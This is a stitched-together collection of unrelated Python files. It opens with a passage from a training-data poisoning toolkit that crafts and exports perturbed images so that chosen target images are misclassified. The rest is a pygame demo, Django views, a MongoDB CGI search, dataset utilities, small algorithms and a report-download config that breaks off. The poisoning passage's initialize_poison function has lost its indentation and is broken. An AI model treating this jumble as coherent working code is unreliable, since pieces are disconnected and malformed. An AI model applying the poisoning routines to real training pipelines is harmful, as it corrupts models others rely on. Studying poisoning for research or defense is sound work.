        for index in range(len(self.trainset)):  # we actually iterate this way not to iterate over the images
            target, idx = self.trainset.get_target(index)
            if target == self.poison_setup['poison_class']:
                class_ids.append(idx)
        poison_num = int(np.ceil(self.args.budget * len(self.trainset)))
        print(len(class_ids), poison_num)
        if len(class_ids) < poison_num:
            warnings.warn(f'Training set is too small for requested poison budget. \n'
                          f'Budget will be reduced to maximal size {len(class_ids)}')
            poison_num = len(class_ids)
        self.poison_ids = torch.tensor(np.random.choice(
            class_ids, size=poison_num, replace=False), dtype=torch.long)
        print("Selected poisons", self.poison_ids)
    else:
        # No poison class restriction: draw poisons from the whole train set.
        total_ids = []
        for index in range(len(self.trainset)):  # we actually iterate this way not to iterate over the images
            _, idx = self.trainset.get_target(index)
            total_ids.append(idx)
        poison_num = int(np.ceil(self.args.budget * len(self.trainset)))
        if len(total_ids) < poison_num:
            warnings.warn(f'Training set is too small for requested poison budget. \n'
                          f'Budget will be reduced to maximal size {len(total_ids)}')
            poison_num = len(total_ids)
        self.poison_ids = torch.tensor(np.random.choice(
            total_ids, size=poison_num, replace=False), dtype=torch.long)
    # Targets:
    if self.poison_setup['target_class'] is not None:
        # Half of the car dataset becomes the target set; the rest is kept
        # aside as "unseen" targets.
        class_ids = []
        for index in range(len(self.carset)):  # we actually iterate this way not to iterate over the images
            _, idx = self.carset.get_target(index)
            class_ids.append(idx)
        print(len(self.carset), class_ids)
        self.target_ids = np.random.choice(class_ids, size=int(len(self.carset) * 0.5), replace=False)
        print("Selected targets: random 20 ", self.target_ids)
        remaining_cars = [item for item in class_ids if item not in self.target_ids]
        self.rem_ids = np.array(remaining_cars)
        print("Remaining cars : ", self.rem_ids)
    else:
        total_ids = []
        for index in range(len(self.validset)):  # we actually iterate this way not to iterate over the images
            _, idx = self.validset.get_target(index)
            total_ids.append(idx)
        self.target_ids = np.random.choice(total_ids, size=self.args.targets, replace=False)
        # BUG FIX: self.rem_ids was only assigned in the branch above, so
        # building unseentargetset below raised AttributeError whenever
        # target_class was None. Default to "no remaining cars" here.
        self.rem_ids = np.array([], dtype=int)
    #targetset = Subset(self.validset, indices=self.target_ids)
    targetset = Subset(self.carset, indices=self.target_ids)
    unseentargetset = Subset(self.carset, indices=self.rem_ids)
    # search from multi car dataset
    valid_indices = []
    for index in range(len(self.validset)):
        _, idx = self.validset.get_target(index)
        if idx not in self.target_ids:
            valid_indices.append(idx)
    validset = Subset(self.validset, indices=valid_indices)
    poisonset = Subset(self.trainset, indices=self.poison_ids)
    # Construct lookup table: poison id -> slot in the poison_delta tensor.
    self.poison_lookup = dict(zip(self.poison_ids.tolist(), range(poison_num)))
    return poisonset, targetset, validset, unseentargetset
def initialize_poison(self, initializer=None):
"""Initialize according to args.init.
Propagate initialization in distributed settings.
"""
print("initialise poison")
if initializer is None:
initializer = self.args.init
# ds has to be placed on the default (cpu) device, not like self.ds
ds = torch.tensor(self.trainset.data_std)[None, :, None, None]
if initializer == 'zero':
init = torch.zeros(len(self.poison_ids), *self.trainset[0][0].shape)
elif initializer == 'rand':
init = (torch.rand(len(self.poison_ids), *self.trainset[0][0].shape) - 0.5) * 2
init *= self.args.eps / ds / 255
elif initializer == 'randn':
init = torch.randn(len(self.poison_ids), *self.trainset[0][0].shape)
init *= self.args.eps / ds / 255
elif initializer == 'normal':
init = torch.randn(len(self.poison_ids), *self.trainset[0][0].shape)
else:
raise NotImplementedError()
init.data = torch.max(torch.min(init, self.args.eps / ds / 255), -self.args.eps / ds / 255)
# If distributed, sync poison initializations
if self.args.local_rank is not None:
if DISTRIBUTED_BACKEND == 'nccl':
init = init.to(device=self.setup['device'])
torch.distributed.broadcast(init, src=0)
init.to(device=torch.device('cpu'))
else:
torch.distributed.broadcast(init, src=0)
return init
""" EXPORT METHODS """
def export_poison(self, poison_delta, path=None, mode='automl'):
    """Export poisons in either packed mode (just ids and raw data) or in full export mode, exporting all images.

    In full export mode, export data into folder structure that can be read by a torchvision.datasets.ImageFolder
    In automl export mode, export data into a single folder and produce a csv file that can be uploaded to
    google storage.

    Args:
        poison_delta: Perturbation tensor, rows indexed via self.poison_lookup.
        path: Output directory; defaults to ``self.args.poison_path``.
        mode: 'packed' | 'limited' | 'full' | 'automl-upload' | 'automl-all'
              | 'automl-baseline' | 'numpy' | 'kettle-export' | 'benchmark'.

    Raises:
        NotImplementedError: For an unrecognized mode.
    """
    print("export poison")
    if path is None:
        path = self.args.poison_path
    # Per-channel denormalization constants for tensor -> image conversion.
    dm = torch.tensor(self.trainset.data_mean)[:, None, None]
    ds = torch.tensor(self.trainset.data_std)[:, None, None]

    def _torch_to_PIL(image_tensor):
        """Torch->PIL pipeline as in torchvision.utils.save_image."""
        image_denormalized = torch.clamp(image_tensor * ds + dm, 0, 1)
        image_torch_uint8 = image_denormalized.mul(255).add_(0.5).clamp_(0, 255).permute(1, 2, 0).to('cpu', torch.uint8)
        image_PIL = PIL.Image.fromarray(image_torch_uint8.numpy())
        return image_PIL

    def _save_image(input, label, idx, location, train=True):
        """Save input image to given location, add poison_delta if necessary."""
        filename = os.path.join(location, str(idx) + '.png')
        lookup = self.poison_lookup.get(idx)
        if (lookup is not None) and train:
            # NOTE(review): `+=` modifies the tensor in place; if the dataset
            # hands out cached tensors this also alters the dataset copy —
            # confirm that is intended.
            input += poison_delta[lookup, :, :, :]
        _torch_to_PIL(input).save(filename)

    # Save either into packed mode, ImageDataSet Mode or google storage mode
    if mode == 'packed':
        data = dict()
        data['poison_setup'] = self.poison_setup
        data['poison_delta'] = poison_delta
        data['poison_ids'] = self.poison_ids
        data['target_images'] = [data for data in self.targetset]
        # BUG FIX: the filename previously embedded `path`
        # (f'{path}poisons_packed_...') and was then ALSO joined with `path`
        # below, producing a doubled path prefix. Use the bare filename here.
        name = f'poisons_packed_{datetime.date.today()}.pth'
        # NOTE(review): the `data` dict assembled above is never written; only
        # [poison_delta, poison_ids] is saved — confirm the intended payload.
        torch.save([poison_delta, self.poison_ids], os.path.join(path, name))
    elif mode == 'limited':
        # Save only the poisoned subset of the training set...
        names = self.trainset.classes
        for name in names:
            os.makedirs(os.path.join(path, 'train', name), exist_ok=True)
            os.makedirs(os.path.join(path, 'targets', name), exist_ok=True)
        for input, label, idx in self.trainset:
            lookup = self.poison_lookup.get(idx)
            if lookup is not None:
                _save_image(input, label, idx, location=os.path.join(path, 'train', names[label]), train=True)
        print('Poisoned training images exported ...')
        # ...plus the secret targets, filed under their intended (wrong) class.
        for enum, (target, _, idx) in enumerate(self.targetset):
            intended_class = self.poison_setup['intended_class'][enum]
            _save_image(target, intended_class, idx, location=os.path.join(path, 'targets', names[intended_class]), train=False)
        print('Target images exported with intended class labels ...')
    elif mode == 'full':
        # Save the complete training/validation sets in ImageFolder layout.
        names = self.trainset.classes
        for name in names:
            os.makedirs(os.path.join(path, 'train', name), exist_ok=True)
            os.makedirs(os.path.join(path, 'test', name), exist_ok=True)
            os.makedirs(os.path.join(path, 'targets', name), exist_ok=True)
        for input, label, idx in self.trainset:
            _save_image(input, label, idx, location=os.path.join(path, 'train', names[label]), train=True)
        print('Poisoned training images exported ...')
        for input, label, idx in self.validset:
            _save_image(input, label, idx, location=os.path.join(path, 'test', names[label]), train=False)
        print('Unaffected validation images exported ...')
        # Save secret targets
        for enum, (target, _, idx) in enumerate(self.targetset):
            intended_class = self.poison_setup['intended_class'][enum]
            _save_image(target, intended_class, idx, location=os.path.join(path, 'targets', names[intended_class]), train=False)
        print('Target images exported with intended class labels ...')
    elif mode in ['automl-upload', 'automl-all', 'automl-baseline']:
        from ..utils import automl_bridge
        targetclass = self.targetset[0][1]
        poisonclass = self.poison_setup["poison_class"]
        # Sanitize the run name for google storage (alphanumerics only).
        name_candidate = f'{self.args.name}_{self.args.dataset}T{targetclass}P{poisonclass}'
        name = ''.join(e for e in name_candidate if e.isalnum())
        if mode == 'automl-upload':
            automl_phase = 'poison-upload'
        elif mode == 'automl-all':
            automl_phase = 'all'
        elif mode == 'automl-baseline':
            automl_phase = 'upload'
        automl_bridge(self, poison_delta, name, mode=automl_phase, dryrun=self.args.dryrun)
    elif mode == 'numpy':
        # Export the poisoned training set as raw HWC arrays.
        _, h, w = self.trainset[0][0].shape
        training_data = np.zeros([len(self.trainset), h, w, 3])
        labels = np.zeros(len(self.trainset))
        for input, label, idx in self.trainset:
            lookup = self.poison_lookup.get(idx)
            if lookup is not None:
                input += poison_delta[lookup, :, :, :]
            training_data[idx] = np.asarray(_torch_to_PIL(input))
            labels[idx] = label
        np.save(os.path.join(path, 'poisoned_training_data.npy'), training_data)
        np.save(os.path.join(path, 'poisoned_training_labels.npy'), labels)
    elif mode == 'kettle-export':
        # Pickle the whole kettle together with the poison for later reuse.
        with open(f'kette_{self.args.dataset}{self.args.model}.pkl', 'wb') as file:
            pickle.dump([self, poison_delta], file, protocol=pickle.HIGHEST_PROTOCOL)
    elif mode == 'benchmark':
        foldername = f'{self.args.name}_{"_".join(self.args.net)}'
        sub_path = os.path.join(path, 'benchmark_results', foldername, str(self.args.benchmark_idx))
        os.makedirs(sub_path, exist_ok=True)
        # Poisons
        benchmark_poisons = []
        for lookup, key in enumerate(self.poison_lookup.keys()):  # This is a different order than we usually do for compatibility with the benchmark
            input, label, _ = self.trainset[key]
            input += poison_delta[lookup, :, :, :]
            benchmark_poisons.append((_torch_to_PIL(input), int(label)))
        with open(os.path.join(sub_path, 'poisons.pickle'), 'wb+') as file:
            pickle.dump(benchmark_poisons, file, protocol=pickle.HIGHEST_PROTOCOL)
        # Target
        target, target_label, _ = self.targetset[0]
        with open(os.path.join(sub_path, 'target.pickle'), 'wb+') as file:
            pickle.dump((_torch_to_PIL(target), target_label), file, protocol=pickle.HIGHEST_PROTOCOL)
        # Indices
        with open(os.path.join(sub_path, 'base_indices.pickle'), 'wb+') as file:
            pickle.dump(self.poison_ids, file, protocol=pickle.HIGHEST_PROTOCOL)
    else:
        raise NotImplementedError()
    print('Dataset fully exported.')
|
from Tkinter import *
from iso.Input import *
from iso.Scene import *
from iso.Viewport import *
from iso.Scroller import *
from iso.SpritePicker import *
from iso.SpriteGrabber import *
from iso.Sprite import *
from iso.Updateables import *
from iso.utils import *
from iso.Vector3D import *
from Terrain import *
from Heightmap import *
import pygame
class Example():
    """Minimal PySmallIso demo: builds a layered scene with three sprites on
    simplex-noise terrain and runs the pygame main loop at 60 FPS."""

    def __init__(self):
        pygame.init()
        pygame.display.set_caption("PySmallIsoExample")
        surface = pygame.display.set_mode(
            (1024, 768), pygame.RESIZABLE | pygame.DOUBLEBUF | pygame.HWSURFACE)
        self.screen = surface

        # Core engine objects: input dispatch, layered scene, viewport.
        event_input = Input()
        scene = Scene()
        for layer_name, depth in (("Land", 0), ("Overlays", 1), ("Overground", 2)):
            scene.addLayer(layer_name, depth)
        view = Viewport(surface, scene)
        self.viewport = view

        # Interaction helpers wired to the viewport.
        scroller = Scroller(view, event_input)
        scroller.enable()
        updater = Updater()
        self.updater = updater
        picker = SpritePicker(event_input, view)
        picker.enable()
        grabber = SpriteGrabber(event_input, view)
        grabber.enable()

        # Place the three demo sprites on the "Overground" layer.
        for asset, location in (("assets/truck.png", None),
                                ("assets/aircraft.png", Vector3D(0.5, 0, 0)),
                                ("assets/forklift.png", Vector3D(0.5, 0.5, 0))):
            sprite = Sprite(loadImage(asset))
            if location is not None:
                sprite.setLocation(location)
            scene.addSprite("Overground", sprite)

        # Generate terrain tiles from a simplex heightmap.
        heightmap = SimplexHeightmap(200, 200)
        for tile in Terrain(heightmap).create():
            scene.addSprite("Land", tile)

        # Main loop: pump events, redraw, update, flip, cap at 60 FPS.
        running = True
        clock = pygame.time.Clock()
        while running:
            for event in pygame.event.get():
                if event.type == pygame.QUIT:
                    running = False
                else:
                    event_input.handleEvent(event)
            self.redraw()
            self.update()
            pygame.display.flip()
            clock.tick(60)

    def redraw(self):
        """Clear the screen to white and draw the viewport."""
        self.screen.fill((255, 255, 255))
        self.viewport.draw()

    def update(self):
        """Advance all registered updateables by one tick."""
        self.updater.update()
# Script entry point: constructing Example blocks inside its own main loop.
if __name__ == "__main__":
    game = Example()
|
from django.shortcuts import render
from rest_framework import status
from rest_framework.response import Response
from rest_framework.decorators import api_view
from pdf2image import convert_from_bytes, convert_from_path
import os
from django.core.files.storage import default_storage
from django.core.files.base import ContentFile
from django.conf import settings
from datetime import datetime
from .models import JsonData
import ast
@api_view(['POST'])
def upload(request):
    """Accept a PDF upload, rasterize each page to a webp image plus a
    thumbnail, persist the page manifest as a JsonData row, and return it.

    Expects the PDF under the ``pdf`` key of a multipart POST.
    """
    file = request.FILES['pdf']
    # Timestamp the stored file name to avoid collisions.
    timestamp = datetime.timestamp(datetime.now())
    path = default_storage.save('media/' + str(timestamp) + '.pdf', ContentFile(file.read()))
    tmp_file = os.path.join(settings.MEDIA_ROOT, path)
    images = convert_from_path(tmp_file, dpi=70)
    content = []
    for count, image in enumerate(images, start=1):
        temp = {'page': count}
        real_image = "media/" + str(timestamp) + str(count) + ".webp"
        # BUG FIX: PIL's Image.resize returns a NEW image and does not modify
        # the original; the previous code discarded both resize results and
        # saved every page (and its "thumbnail") at native resolution.
        page_image = image.resize((1438, 922))
        page_image.save(real_image, "webp", optimize=True, quality=7)
        temp['image'] = real_image
        thumb = "media/" + str(timestamp) + str(count) + "-thumb.webp"
        thumb_image = image.resize((119, 185))
        thumb_image.save(thumb, "webp", optimize=True, quality=7)
        temp['thumb'] = thumb
        content.append(temp)
    # objects.create() already persists the row; no extra save() is needed.
    JsonData.objects.create(content=content)
    return Response(content, status=status.HTTP_200_OK)
@api_view(['GET'])
def latest(request):
    """Return the page manifest of the most recently uploaded PDF."""
    # ROBUSTNESS FIX: indexing an empty queryset with [0] raised IndexError
    # (HTTP 500) before the first upload; return 404 instead.
    data = JsonData.objects.order_by('-id').first()
    if data is None:
        return Response({'message': 'Please upload the file'},
                        status=status.HTTP_404_NOT_FOUND)
    # content is stored as the repr of a Python structure; parse it back
    # safely (literal_eval never executes code, unlike eval).
    return Response(ast.literal_eval(data.content), status=status.HTTP_200_OK)
# except ValueError:
# content = {
# 'message': "Please upload the file"
# }
# return Response(content, status=status.HTTP_400_BAD_REQUEST)
|
# Generated by Django 2.2.13 on 2020-07-04 15:41
from django.db import migrations
class Migration(migrations.Migration):
    """Drop the Carousel model introduced in migration 0015_carousel.

    NOTE(review): auto-generated Django migration — keep byte-stable; manual
    edits can desynchronize the recorded migration history.
    """

    dependencies = [
        ('shop', '0015_carousel'),
    ]

    operations = [
        migrations.DeleteModel(
            name='Carousel',
        ),
    ]
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
'''
@File : 01-split_dataset.py
@Time : 2020/02/19 09:58:11
@Author : liululu
@brief : 划分数据集,制作my_dataset
@Contact : liululu827@163.com
@Desc : None
'''
# here put the import lib
import os
import random
# shutil.copy(source,destination)将source的文件拷贝到destination,两个参数都是字符串格式。
import shutil
def makedir(new_dir):
    """Create directory *new_dir* (including parents) if it does not exist.

    Uses ``exist_ok=True`` so the check-then-create race of the original
    ``os.path.exists`` guard cannot raise FileExistsError.
    """
    os.makedirs(new_dir, exist_ok=True)
if __name__ == '__main__':

    # Fixed seed so the train/valid/test split is reproducible.
    random.seed(1)

    dataset_dir = os.path.join('..', 'data', 'RMB_data')
    split_dir = os.path.join('..', 'data', 'my_dataset')
    train_dir = os.path.join(split_dir, "train")
    valid_dir = os.path.join(split_dir, "valid")
    test_dir = os.path.join(split_dir, "test")
    # print(train_dir)

    # Split ratios: 80% train, 10% validation, 10% test.
    train_pct = 0.8
    valid_pct = 0.1
    test_pct = 0.1

    # (translation of the note below) os.walk yields, per directory visited:
    #   root  - path of the directory currently being walked
    #   dirs  - subdirectory names directly under root (no recursion)
    #   files - file names directly under root (no recursion)
    '''
    root 所指的是当前正在遍历的这个文件夹的本身的地址
    dirs 是一个 list ,内容是该文件夹中所有的目录的名字(不包括子目录)
    files 同样是 list , 内容是该文件夹中所有的文件(不包括子目录)
    '''
    for root, dirs, files in os.walk(dataset_dir):
        for sub_dir in dirs:  # every class folder under dataset_dir
            imgs = os.listdir(os.path.join(root, sub_dir))  # all file names in sub_dir
            imgs = list(
                filter(
                    lambda x: x.endswith('.jpg'),
                    imgs))  # keep only the .jpg files in sub_dir
            # Shuffle before splitting so the split is random.
            random.shuffle(imgs)
            img_count = len(imgs)
            # Index boundaries between the three splits.
            train_point = int(img_count * train_pct)
            valid_point = int(img_count * (train_pct + valid_pct))
            # Route each image into train / valid / test by position.
            for i in range(img_count):
                if i < train_point:
                    out_dir = os.path.join(train_dir, sub_dir)
                elif i < valid_point:
                    out_dir = os.path.join(valid_dir, sub_dir)
                else:
                    out_dir = os.path.join(test_dir, sub_dir)
                # print(out_dir)
                makedir(out_dir)
                # Copy the image into the chosen split folder.
                target_path = os.path.join(out_dir, imgs[i])
                src_path = os.path.join(dataset_dir, sub_dir, imgs[i])
                shutil.copy(src_path, target_path)
            print(
                'Class:{}, train:{}, valid:{}, test:{}'.format(
                    sub_dir,
                    train_point,
                    valid_point -
                    train_point,
                    img_count -
                    valid_point))
|
import pandas as pd
# Load the paths spreadsheet; header=None so columns are purely positional.
# NOTE(review): hard-coded absolute Windows path — breaks on any other
# machine; consider a relative path or a CLI argument.
df = pd.read_csv(r"C:\Users\avivy\GitHub\Hacking 101\.CSV\Paths.csv", header=None)
# Column views as numpy arrays (A=0 .. D=3). B and C are currently unused.
A_col = df.iloc[:, 0].values
B_col = df.iloc[:, 1].values
C_col = df.iloc[:, 2].values
D_col = df.iloc[:, 3].values
print(D_col[4])
# Stop here; the batch-generation loop below is kept for reference only.
exit()
# for i in range(186):
# print("start " + A_col[1] + str(i) + "\n" + "timeout /t 5")
|
from itertools import cycle
from shared import read_input_lines, exec_cl_function
INPUT = '../input/day1.txt'
def first_duplicate():
    """Cycle through the puzzle's frequency changes, accumulating a running
    total, and return the first total that occurs twice together with the
    number of distinct totals seen before the repeat."""
    history = set()
    running = 0
    for delta in cycle(read_input_lines(INPUT, convert_to=int)):
        running += delta
        if running in history:
            return running, len(history)
        history.add(running)
def part1():
    """Part 1: print the sum of all frequency changes in the input file."""
    print(sum(read_input_lines(INPUT, convert_to=int)))
def part2():
    """Part 2: print the first repeated running total and how many distinct
    totals were seen before it."""
    print('first duplicate result {} after {:,d} calculations'.format(
        *first_duplicate()))
# Entry point: exec_cl_function (imported from `shared`) presumably selects
# part1/part2 from the command line — confirm in the shared module.
if __name__ == '__main__':
    exec_cl_function()
|
from django.forms import TextInput
from django import forms
from ...models import Address
class AddressForm(forms.ModelForm):
    """ModelForm for Address with Spanish placeholders and labels.

    ``appartment`` and ``floor`` are made optional in ``__init__``.
    NOTE(review): 'comuna' is listed in ``fields`` but has no entry in
    ``widgets`` or ``labels`` — it falls back to Django defaults; confirm
    that is intentional.
    """

    class Meta:
        model = Address
        #fields = '__all__'
        fields = ['alias','street','number','appartment','floor','comuna','comments']
        # Placeholder text shown inside the empty inputs.
        widgets = {
            'alias' : TextInput(attrs={'placeholder': '<alias>'}),
            'street' : TextInput(attrs={'placeholder': '<calle>'}),
            'number' : TextInput(attrs={'placeholder': '<número>'}),
            'appartment' : TextInput(attrs={'placeholder': '<opcional>'}),
            'floor' : TextInput(attrs={'placeholder': '<opcional>'}),
            'comments' : TextInput(attrs={'placeholder': '<opcional>'}),
        }
        # Spanish display labels for the rendered form.
        labels = {
            'alias' : 'Alias',
            'street' : 'Calle',
            'number' : 'Número',
            'appartment' : 'Departamento',
            'floor' : 'Piso',
            'comments' : 'Referencia',
        }

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # Apartment and floor are optional parts of an address.
        self.fields['appartment'].required = False
        self.fields['floor'].required = False
|
# Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# GYP build definition: an executable whose source file name contains a
# colon ('a:b.c'), used in both 'sources' and 'copies' to exercise the
# MSVS path handling noted below.
{
  'targets': [
    {
      'target_name': 'colon',
      'type': 'executable',
      'sources': [
        'a:b.c',
      ],
      'copies': [
        {
          'destination': '<(PRODUCT_DIR)/',
          # MSVS2008 gets confused if the same file is in 'sources' and 'copies'
          'files': [ 'a:b.c-d', ],
        },
      ],
    },
  ],
}
|
import sys
try:
from Tkinter import *
except ImportError:
from tkinter import *
class CreateMenu(Menu):
    """Application menu bar with File and Help cascades.

    Every command delegates to a method on *root*, which must provide
    new_file/open_file/save_file/save_close_file/quit/donothing.
    """

    def __init__(self, root):
        Menu.__init__(self, root)

        # File menu: (label, callback) pairs; None marks a separator.
        self.filemenu = Menu(self, tearoff=0)
        file_entries = [
            ("New", root.new_file),
            ("Open", root.open_file),
            ("Save", root.save_file),
            # NOTE(review): same callback as "Save" — confirm root has no
            # dedicated save_as handler.
            ("Save as...", root.save_file),
            ("Save and Close", root.save_close_file),
            None,
            ("Exit", root.quit),
        ]
        for entry in file_entries:
            if entry is None:
                self.filemenu.add_separator()
            else:
                text, callback = entry
                self.filemenu.add_command(label=text, command=callback)
        self.add_cascade(label="File", menu=self.filemenu)

        # Help menu.
        self.helpmenu = Menu(self, tearoff=0)
        for text, callback in (("Help Index", root.donothing),
                               ("About...", root.donothing)):
            self.helpmenu.add_command(label=text, command=callback)
        self.add_cascade(label="Help", menu=self.helpmenu)
|
################################################################################
# https://stackoverflow.com/questions/14132789/relative-imports-for-the-billionth-time
################################################################################
import sys
import os
def add_import_absolute_folder(folder):
    """Prepend the absolute form of *folder* to sys.path.

    Import hack to make external private data importable.
    """
    resolved = os.path.abspath(folder)
    print(f"{__name__}: add {resolved} to sys.path")
    sys.path.insert(0, resolved)
    print(f"{__name__}: sys.path: {sys.path}")
print(f"{__name__}: sys.path: {sys.path}")
def add_parent_import():
    """Prepend the literal relative path ".." to sys.path.

    Import hack to make modules in the parent directory importable.
    """
    parent = ".."
    print(f"{__name__}: add {parent} to sys.path")
    sys.path.insert(0, parent)
    print(f"{__name__}: sys.path: {sys.path}")
################################################################################
# https://stackoverflow.com/questions/14132789/relative-imports-for-the-billionth-time
# https://chrisyeh96.github.io/2017/08/08/definitive-guide-python-imports.html#case-3-importing-from-parent-directory
################################################################################
def parent_import():
    """
    add project root to sys.path to import from parent folder
    change the number of ".." accordingly
    """
    script_dir = os.path.dirname(sys.argv[0])
    root = os.path.abspath(os.path.join(script_dir, ".."))
    print(f"adding project root tp sys.path: {root=}")
    sys.path.append(root)
################################################################################
def show_syspath():
    """Print every sys.path entry, one "n=…, p=…" line per entry."""
    # The f-string embeds the variable names (n=, p=), so they are part of
    # the output format and must stay named n and p.
    n = 0
    for p in sys.path:
        print(f"{n=}, {p=}")
        n += 1
if __name__ == '__main__':
    if not __package__:
        """
        running this script directly
        """
        # No package context: absolute import of the sibling module works.
        print("not package")
        import parentimport
        parentimport.parent_import()
        # parentimport.show_syspath()
        # from debug import Debug
        # from config import parse_arguments
    else:
        """
        importing this script from another script
        """
        # Package context present (e.g. python -m ...): use a relative import.
        print("__package__: ", __package__)
        from . import parentimport
        parentimport.parent_import()
        # parentimport.show_syspath()
        # from .debug import Debug # ok
        # from .config import parse_arguments
|
#!/Users/there/miniconda3/envs/NLP_Koncks/bin/python
# coding: utf-8
from string import Template
import pymongo
from pymongo import MongoClient
import cgi
import cgitb
from html import escape
cgitb.enable()
# Maximum number of matching records rendered on one page.
max_view_count = 20

# Page shell: search form plus $message and $contents placeholders.
template_html = Template('''
<html>
<head>
<title>Database MusicBrainz</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<style>
body{
max-width:410px;
padding: 10%;
margin:0 auto;
}
</style>
</head>
<body>
<form method="GET" action="/cgi-bin/main.py">
Name or aliases:<br>
<input type="text" name="name" value="$clue_name" size="20"/><br />
Tag:<br>
<input type="text" name="tag" value="$clue_tag" size="20"/><br />
<input type="submit" value="Search"/>
</form>
$message
$contents
</body>
</html>
''')

# Result card rendered once per matching artist.
template_result = Template('''
<hr />
Record $index of $total:<br />
<li>Name: $name <br />
<li>Aliases: $aliases<br />
<li>Activity area: $area <br />
<li>Tags: $tags <br />
<li>Rating: $rating <br />
''')

# Connect to the default local MongoDB instance and select the artists
# collection of the MusicBrainz database.
client = MongoClient()
db = client.db_MusicBrainz
collection = db.artists

# Build the Mongo query ("clue") from the submitted GET form fields.
form = cgi.FieldStorage()
clue = {}
clue_name = ''
clue_tag = ''
if 'name' in form:
    clue_name = form['name'].value
    # Match either the canonical name or any alias.
    clue = {'$or': [{'name': clue_name}, {'aliases.name': clue_name}]}
if 'tag' in form:
    clue_tag = form['tag'].value
    if len(clue) > 0:
        # Both fields given: require name AND tag to match.
        clue = {'$and': [clue, {'tags.value': clue_tag}]}
    else:
        clue = {'tags.value': clue_tag}

contents = ''
total = -1  # -1 means "no search submitted yet"
if len(clue) > 0:
    results = collection.find(clue)
    # Most-rated artists first.
    results.sort('rating.count', pymongo.DESCENDING)
    # NOTE(review): Cursor.count() was removed in PyMongo 4.x (and the `cgi`
    # module was removed in Python 3.13) — this script requires older
    # versions; confirm the deployment environment.
    total = results.count()
    dict_template = {}
    # Render at most max_view_count result cards, HTML-escaping all values.
    for i, doc in enumerate(results[0:max_view_count], start=1):
        dict_template['index'] = i
        dict_template['total'] = total
        dict_template['name'] = escape(doc['name'])
        if 'aliases' in doc:
            dict_template['aliases'] = \
                ','.join(escape(alias['name']) for alias in doc['aliases'])
        else:
            dict_template['aliases'] = 'NONE'
        if 'area' in doc:
            dict_template['area'] = escape(doc['area'])
        else:
            dict_template['area'] = 'NONE'
        if 'tags' in doc:
            dict_template['tags'] = \
                ','.join(escape(tag['value']) for tag in doc['tags'])
        else:
            dict_template['tags'] = 'NONE'
        if 'rating' in doc:
            dict_template['rating'] = doc['rating']['count']
        else:
            dict_template['rating'] = 'NONE'
        contents += template_result.substitute(dict_template)

# Fill the page shell and emit it as the CGI response body.
dict_template = {}
dict_template['clue_name'] = escape(clue_name)
dict_template['clue_tag'] = escape(clue_tag)
dict_template['contents'] = contents
if total > max_view_count:
    dict_template['message'] = 'Displaying the top {} items.'.format(max_view_count)
elif total == -1:
    dict_template['message'] = 'Please enter search clue.'
elif total == 0:
    dict_template['message'] = 'No matching artists found.'
else:
    dict_template['message'] = ''
print(template_html.substitute(dict_template))
|
import re
# NOTE: Python 2 syntax (print statements below).
# Scrape brand ids of the form input id="Brand-<id>" out of a saved
# Snapdeal HTML page and print them as a Python-style list literal.
f = open("snapdeal.txt",'r')
p = re.compile('input id="Brand-([a-zA-Z0-9]*)"\n*')
print '[',
for line in f:
    match = re.findall(p,line)
    if match :
        # Trailing commas keep everything on one line, building the list.
        print "'",match[0],"',",
print ']'
#!/usr/bin/env python
"""
Implementation of sequential search on both
ordered and unordered arrays.
"""
from typing import Union, Sequence
TARGETS = Union[str, int, float]
def seq_search(arr: Sequence[TARGETS], elem: TARGETS) -> bool:
    """
    Unordered Array
    Time Complexity: O(n)

    Return True iff *elem* occurs anywhere in *arr*.
    """
    # Idiomatic early-return scan replaces the original while/flag loop;
    # like the original, it stops at the first match.
    for item in arr:
        if item == elem:
            return True
    return False
def seq_search_ordered(arr: Sequence[TARGETS], elem: TARGETS) -> bool:
    """
    Ordered (ascending) Array
    Time Complexity: O(n)

    Return True iff *elem* occurs in *arr*; stops early as soon as the
    current item exceeds *elem*, since it cannot appear later.
    """
    for item in arr:
        if item == elem:
            return True
        if item > elem:
            # Passed the position where elem would have to be.
            return False
    return False
def main():
    """Demo both search variants on sample data, printing the results."""
    unordered = [20, 54, 1, 2, 5, 78, 5, 322, 23, 14]
    print(seq_search(unordered, 5))
    ascending = [33, 44, 56, 189, 999, 1234, 55442, 888998]
    print(seq_search_ordered(ascending, 1235))
# Run the demo when executed as a script.
if __name__ == "__main__":
    main()
|
# Read an integer; if positive, print it rounded UP to a multiple of 10.
# NOTE(review): for exact multiples of 10 this prints tt + 10 (e.g. 20 -> 30)
# because tt % 10 == 0 — confirm whether multiples should map to themselves.
tt=int(input())
if tt>0:
    print(tt+(10-(tt%10)))
|
# coding=utf-8
# Python 2 shim: force the process default string encoding to UTF-8 so the
# Chinese report filenames below can be handled without explicit decoding.
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
from wgdata.utils import _yesterday
# Download-job configuration table, keyed by report id ("customerN").
# Each entry describes one back-office report export:
#   URL / SPARE_URL : primary endpoint (SPARE_URL is a fallback, empty here)
#   METHOD          : HTTP verb
#   PARAMS          : request parameters; date ranges default to yesterday
#   FILE            : local filename (Chinese report name + date) and type
# NOTE(review): customer4-10 omit METHOD, and customer7/10 omit SPARE_URL
# or date params — confirm the downloader supplies defaults for these.
dl_file_conf = {
    "customer1": {
        'URL': 'http://console.sxbrme.com:25031/console_xh_member_account/account/customer/customerList.action',
        'SPARE_URL': '',
        "METHOD": "POST",
        'PARAMS': {
            "ec_i": "ec",
            "eti": "ec",
            "eti_p": "false",
            "ec_efn": "(unable to decode value)",
            "ec_ev": "csv",
            "startdate": _yesterday(),
            "enddate": _yesterday()
        },
        "FILE": {
            'FILENAME': "交易商维护_{yesterday}".format(yesterday=_yesterday()),
            "FILETYPE": "csv"
        }
    },
    "customer2": {
        'URL': 'http://console.sxbrme.com:25031/console_xh_member_bank/bankInterface/moneyInfo/capitalExcle.jsp',
        'SPARE_URL': '',
        "METHOD": "POST",
        'PARAMS': {
            "s_time": _yesterday(),
            "e_time": _yesterday(),
        },
        "FILE": {
            "FILENAME": "出入金管理_{yesterday}".format(yesterday=_yesterday()),
            "FILETYPE": "csv"
        }
    },
    "customer3": {
        'URL': 'http://console.sxbrme.com:26026/console-shell-m-newreport/reportExcel',
        'SPARE_URL': '',
        "METHOD": "POST",
        'PARAMS': {
            'viewName': 'v_customerhold_search_his_news',
